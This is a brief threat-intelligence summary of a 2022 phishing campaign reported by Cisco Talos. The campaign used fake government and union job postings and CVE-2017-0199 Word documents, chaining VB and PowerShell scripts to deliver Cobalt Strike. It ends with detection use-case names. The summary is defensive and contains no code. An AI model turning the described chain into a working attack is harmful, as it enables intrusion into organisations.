Job Postings for Government and Unions Lead to Cobalt Strike

Category: Threat Actor Activity | Industries: Government, Union| Level: Tactical | Source: Cisco Talos

A malicious campaign in August 2022, was discovered by researchers from Cisco Talos using job postings for government and union-themed positions delivering Cobalt Strike beacons. Based on the job postings, the geographic targets of the campaign included the United States and New Zealand. "Talos discovered two attack methodologies employed by the attacker in this campaign: One in which the downloaded DOTM template executes an embedded malicious Visual Basic script, which leads to the generation and execution of other obfuscated VB and PowerShell scripts, and another that involves the malicious VB downloading and running a Windows executable that executes malicious PowerShell commands to download and implant the payload." Phishing emails is the initial access vector used by the threat actors, communicating the open job postings with inquiries for personal information. The email contains a malicious word document exploiting CVE-2017-0199 for remote code execution to download a malicious Word template which will execute a Visual Basic script and in turn PowerShell scripts. The Cobalt Strike beacon arrives as the final payload in the sequence. "This campaign is a typical example of a threat actor using the technique of generating and executing malicious scripts in the victim's system memory. Defenders should implement behavioral protection capabilities in the organization's defense to effectively protect them against fileless threats."

Anvilogic Scenario:

• Malicious Document Leads to Cobalt Strike Beacon

Anvilogic Use Cases:

• Office Binary Download Remote File
• Invoke-Expression Command
• MSIExec Install MSI File

‍